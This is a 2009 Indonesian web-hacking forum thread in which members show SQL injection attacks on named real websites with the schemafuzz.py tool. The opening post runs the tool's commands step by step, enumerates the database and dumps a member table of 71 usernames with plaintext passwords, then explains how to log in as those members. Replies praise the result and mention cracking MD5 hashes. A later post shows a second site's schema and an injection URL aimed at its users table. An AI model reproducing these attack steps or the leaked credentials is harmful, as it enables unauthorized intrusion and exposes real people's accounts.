SQLi pake Schemafuzz

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
anja_indie
Posts: 20
Joined: Thu Jun 19, 2008 1:51 pm

SQLi pake Schemafuzz

Post by anja_indie » Sat Jun 13, 2009 1:33 am

site'a malingshit...

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561 --findcol

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://ccs.my/news.php?id=1561--
[+] Evasion Used: "+" "--"
[+] 06:15:17
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] darkc0de URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5
[-] Done!

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dbs

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:17:31
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0] ccs_myccs
[1] test

[-] 06:17:50
[-] Total URL Requests 4
[-] Done

Don't forget to check schemafuzzlog.txt

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --schema -D ccs_myccs

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:19:09
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing Tables & Columns from database "ccs_myccs"
[+] Number of Tables: 36

[Database]: ccs_myccs
[Table: Columns]

[0]addressbook: id,cat_id,cat_id2,cat_id3,update_date,submit_date,name,person,ic,gender,add1,add2,add3,tel,hp,fax,username,password,email,note
[1]addressbook_cat: id,sub_id,name
[2]addressbook_pc: id,add_id,submit_date,name,cpu,ram,hd,vga,sound,cdrom,drive,keyboard,mouse,usb,port,networking,os,antivirus
[3]addressbook_pc_report: id,add_id,submit_date,name,note
[4]cat: id,name,image,visit,bodytag,keyword,desc,description
[5]consignment: id,customer_id,borrow,name,user
[6]enquiry: user_id,area_id,update_date,submit_date,company,name,gender,add1,add2,postcode,home,office,fax,mobile,email,ic,passport,nationality,os,dealer,note
[7]enquiry_area: id,parent_id,top_id,name
[8]faq: id,cat_id,question,answer
[9]faqcat: id,name,visit,description
[10]hosting: id,update_date,name,owner,dealer,server_id,expire,price,note
[11]hostingserver: id,name
[12]invoice_item: id,invoice_id,update_date,submit_date,name,description,qty,price
[13]logs: id,date,name,description
[14]logs_hr: id,date,name,description
[15]member: id,area_id,update_date,submit_date,company,name,gender,add1,add2,username,office,fax,password,email,level,note,staff,dealer,hosting,member
[16]member_leave: id,member_id,update_date,submit_date,leave_date,name,status,note,total_day
[17]member_report: id,member_id,update_date,submit_date,report_date,name,report,total_hour
[18]member_sales: id,member_id,sales_id,update_date,submit_date,sales_date,account_date,bankin_date,name,note,payment,price,cost,profit
[19]member_task: id,customer_id,member_id,leader_id,access_id1,access_id2,access_id3,update_date,submit_date,followup_date,complete_date,name,status,note
[20]member_task_report: id,member_id,task_id,update_date,submit_date,note,time
[21]member_type: id,parent_id,top_id,name
[22]news: id,name,description,submit_date,update_date,visit
[23]package: id,name
[24]package_item: id,package_name_id,product_id
[25]package_name: id,package_id,name
[26]payment: id,update_date,submit_date,invoice_date,name,note,total,sold,paid
[27]po: id,customer_id,update_date,submit_date,name,username
[28]po_item: id,po_id,update_date,name,description,qty,retail,price,note,username
[29]products: id,date1,visit,name1,name2,weight,cat1,cat2,type1,type2,description,image1,image2,price,price_us,offer,dealer,wholesale,cost,note,seller,bodytag,code,date2,date3,stock,stock1,stock2,stock3
[30]products_reserve: id,product_id,customer_id,update_date,submit_date,name,taken_date,username
[31]quotation: id,cat_id,customer_id,dealer_id,update_date,submit_date,quotation_date,invoice_date,po_date,name,invoice,username,remark,regards
[32]quotation_cat: id,sub_id,name
[33]quotation_item: id,quotation_id,update_date,name,description,qty,price,cost,note,username
[34]stock: id,product_id,update_date,submit_date,name,username,log
[35]type: id,name,image,visit,bodytag

[-] 06:45:44
[-] Total URL Requests 315
[-] Done

Don't forget to check schemafuzzlog.txt

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dump -D ccs_myccs -T member -C id,username,password

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:51:41
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Dumping data from database "ccs_myccs" Table "member"
[+] and Column(s) ['id', 'username', 'password']
[+] Number of Rows: 71

[0] 1:cwtan:213:
[1] 2:fkyoon:jk45gb:
[2] 3:xtremecom:hasegawa:
[3] 4:kevinloh:nbv354:
[4] 5:jasonwong:vgb54n:
[5] 20:jeffery_yeoh:sc8bq1:
[6] 7:gtlau:fv62bx:
[7] 8:johan:ndxm532:
[8] 9:mohamed:hdx43n:
[9] 10:johnathan:jsch82d:
[10] 11:jamesgoh:s45xh2:
[11] 34:sean:dsc23:
[12] 13:phchan:ph118:
[13] 14:pccmy:suc51f:
[14] 23:ckphuah:s45f8:
[15] 15:cg-computers:hdxe45:
[16] 16:armen:h2dz52:
[17] 17:matthew:sc25x3:
[18] 18:kyzee:ds5jk7:
[19] 19:george:dh9n2m:
[20] 31:wooijin:wooijin:
[21] 22:raymond-liew:sf28b:
[22] 24:andrewgark:sc19nv:
[23] 25:jamil:sdc739:
[24] 26:irene_tew:kxn349:
[25] 27:chenlung:xun329:
[26] 28:ericlim:un39xv:
[27] 29:tradewinds:sdcb348:
[28] 30:myben:830712b:
[29] 32:brian:jxn267:
[30] 39:elongnet:ds5x8:
[31] 40:shabbir:scvs321h:
[32] 41:evergreen:sdfx125:
[33] 43:raymondlee:xh37b3:
[34] 44:cheryl:bds518:
[35] 45:gadgetzone:asd24h:
[36] 46:dmitri:gb536:
[37] 47:syedali:21gh4:
[38] 48:level3:213:
[39] 49:izmir:hgd752:
[40] 50:izwan:fhdr352:
[41] 51:ooigheetiong:njds641:
[42] 52:thenoiho:dsh629k:
[43] 53:desai:kdie83:
[44] 54:giapseng:sx4k8:
[45] 55:lionel:lionel6:
[46] 56:adrain:
[47] 57:iscc:nhfd63:
[48] 58:rovinlim:sdx413:
[49] 59:maxlee:fkpq134:
[50] 60:syukri:t5u7w2:
[51] 61:jaclyn:vgx216:
[52] 62:davidteoh:tr431k:
[53] 63:yeapch:dx164:
[54] 64:adrianquah:fgzu72:
[55] 65:jameskuick:sg623k:
[56] 66:raymondooi:she369:
[57] 67:cgcomputers:gxk518:
[58] 68:yckai:jh763:
[59] 80:lltan:x41jk8:
[60] 70:kltan:sdk327:
[61] 71:myitech:hgk967:
[62] 72:vss:fxs523:
[63] 73:atconsulting:sc42h6:
[64] 74:skfcomp:sd15h6:
[65] 75:hjwang:crdy483:
[66] 76:cheoh:peb357:
[67] 77:saidatul:sdt528:
[68] 78:shofi:sx39n43:
[69] 79:dynacomb:x4f5k2:
[70] 81:lltan:x41jk8:
[71] No data

[-] 06:55:38
[-] Total URL Requests 73
[-] Done

Don't forget to check schemafuzzlog.txt


Selanjut'a....
register jadi member'a...
(soal'a halaman login bwt member d sembunyiin)
trus login sebagai member yg username 'n password'a dah kita dpt itu...

User avatar
Bi4kKob4r
Posts: 254
Joined: Sat Jul 21, 2007 11:45 am
Location: Bi4kKob4r~root : ls..
Contact:

Re: SQLi pake Schemafuzz

Post by Bi4kKob4r » Sat Jun 13, 2009 1:49 am

hmm... nice show up :D
I think just : Make better than the best

Life is Love,
Love is Feeling,
Feeling is your heart,
Heart Controlling By your brain.

Always INject your brain with the greatest knowledges.

User avatar
bernadsatriani
Posts: 71
Joined: Sat Jan 17, 2009 5:23 am
Location: localhost
Contact:

Re: SQLi pake Schemafuzz

Post by bernadsatriani » Sat Jun 13, 2009 10:40 am

buset dah...
dumping DB user :D

N4ck0
Posts: 65
Joined: Tue Mar 03, 2009 9:57 pm
Location: Under
Contact:

Re: SQLi pake Schemafuzz

Post by N4ck0 » Sat Jun 13, 2009 10:46 am

nice bro
itu kan webnya g terencript md5 yah
nah klo schemafuzz baru dari darkc0de
bia langsung crack tu hash

User avatar
ji_bog
Posts: 19
Joined: Sat May 27, 2006 12:22 am
Location: lagi pengen sendiri..
Contact:

Re: SQLi pake Schemafuzz

Post by ji_bog » Sat Jun 13, 2009 10:17 pm

makasih master atas share nya ;)
soal nya belom pernah pake yang beginian hehehe ;)
sekali lagi thanks for share 8)
signatur saya begini aja deh :D

th3r00t
Posts: 20
Joined: Sat Jun 13, 2009 12:27 pm
Location: Bandung, Jawa Barat
Contact:

Re: SQLi pake Schemafuzz

Post by th3r00t » Mon Jun 15, 2009 4:54 pm

wedew itu kagak di enkrip :D
parah bener tuh site :lol:
Salam kenal dari seorang nyubie,
www.c0mrade.co.cc | www.c0mr4d3.uni.cc

User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:

Re: SQLi pake Schemafuzz

Post by wiLMaR_kiDz » Mon Jun 15, 2009 6:05 pm

wahh...gilaa...mantebb...
gk trenkripmd5...parah dah.... ;) ;)
regards,
ordinary user,-

User avatar
bernadsatriani
Posts: 71
Joined: Sat Jan 17, 2009 5:23 am
Location: localhost
Contact:

Re: SQLi pake Schemafuzz

Post by bernadsatriani » Wed Jun 17, 2009 1:26 pm

wkekekeke

anja_indie
Posts: 20
Joined: Thu Jun 19, 2008 1:51 pm

Re: SQLi pake Schemafuzz

Post by anja_indie » Wed Jun 17, 2009 5:27 pm

klo terenkrip MD5 mah..tinggal d decrypt ajah...
kan ada fastcrack ato MD5 decryptor yg online.....

he...he..

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: SQLi pake Schemafuzz

Post by shad.hckr » Fri Jun 19, 2009 9:48 pm

[+] Gathering MySQL Server Configuration...
Database: ukcds
User: ukcds@localhost
Version: 5.0.22-Debian_0ubuntu6.06.2-log
[+] Starting current users database extraction...

[Database]: ukcds

[Table: Columns]
[0]countries: id,country,country_code,zone_id
[1]document: document_id,document_reference,document_title,document_publish_date
,document_type_id,document_status,document_description,document_authors,document
_keywords,document_access,document_filename
[2]document_type: document_type_id,document_type,display_sequence
[3]event: event_id,event_title,event_date,event_end_date,event_times,event_statu
s,event_start_time,event_end_time,event_image,event_image_caption,event_image_x,
event_image_y,event_body,event_access,event_type_id,allow_booking,show_booking_l
ink
[4]event_bookings: event_booking_id,event_id,title,name,organisation,address,pos
tcode,phone,email,notes,booking_date,booking_status,booking_notes
[5]event_document: event_document_id,event_id,document_id,link_title
[6]event_type: event_type_id,event_type,display_sequence
[7]mail_list: email,name,last_modified_date
[8]members: member_id,member_acronym,member_name,member_body,member_image,member
_url,member_status,member_display_sequence
[9]news: news_id,news_type_id,news_title,news_image,news_image_caption,news_imag
e_x,news_image_y,news_body,news_status,news_publish_date,news_created_datetime,n
ews_last_modified
[10]news_type: news_type_id,news_type,news_status,order_by,page_id,display_seque
nce
[11]pages: page_id,page_status,page_type,cms_page_type,menu_parent,menu_type,men
u_name,menu_sequence,menu_include,require_login,page_filename,page_file_type,pag
e_file_qs,page_title,page_heading,meta_robots,meta_description,meta_keywords,pag
e_image,page_image_type,page_image_text,page_content,admin_notes
[12]person: person_id,person_title,person_first_name,person_surname,person_quali
fications,person_role,person_body,person_image,person_status,position_id
[13]position: position_id,position_name,position_sequence
[14]project: project_id,project_type_id,project_title,project_image,project_imag
e_caption,project_image_x,project_image_y,project_body,project_status,project_pu
blish_date,project_expiry_date,project_created_datetime,project_last_modified
[15]project_type: project_type_id,project_type,order_by,page_id,display_sequence

[16]site: site_id,site_status,site_closed_message,default_page_title,default_met
a_description,default_meta_keywords,bulletin_heading,bulletin,show_bulletin,news
_items_heading,news_items,show_news_items
[17]site_old: site_id,site_status,site_closed_message,default_page_title,default
_meta_description,default_meta_keywords,bulletin,show_bulletin
[18]user_log: log_id,user_id,action,action_time
[19]users: user_id,name,email,password,last_logged_in

[-] Done
Don't forget to check database.txt

http://www.ukcds.org.uk/pages.php?page= ... rom+users/*

Post Reply

Return to “Web Hacking”